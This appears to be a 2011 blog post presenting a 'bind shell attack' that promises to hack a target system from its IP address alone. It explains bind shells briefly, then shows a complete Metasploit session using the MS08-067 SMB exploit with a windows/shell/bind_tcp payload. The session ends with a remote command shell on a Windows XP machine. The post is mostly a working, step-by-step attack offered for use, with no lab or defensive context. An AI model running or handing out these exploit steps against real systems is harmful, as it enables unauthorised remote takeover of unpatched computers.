Sunday 4 December 2011

Bind shell attack (Hack the target system just using the IP address of target)

First download software Metasploit from here
OR Use Backtrack 4 Linux operating system

A bind shell is a remote shell connection providing access to the target system upon successful exploitation and execution of shellcode by setting up a bind port listener. This opens a gateway for an attacker to connect-back to the compromised machine on bind shell port using a tool like netcat which could tunnel the standard input (stdin) and output (stdout) over TCP connection. This scenario works similarly to that of a telnet client establishing connection to a telnet server and suites in the environment where the attacker is behind NAT or Firewall, and direct contact from compromised host to the attacker IP is not possible.

Now I use Backtrack 4 Linux operating system

--------------------------------------
root@bt:~# msfconsole   

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12666 updated today (2011.05.19) 
 
 
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:41289 ->
192.168.0.7:4444) at Sat Nov 13 19:01:23 +0000 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
---------------------------------------

Note -->RHOST is the IP address of target machine

No comments:

Post a Comment

Note: only a member of this blog may post a comment.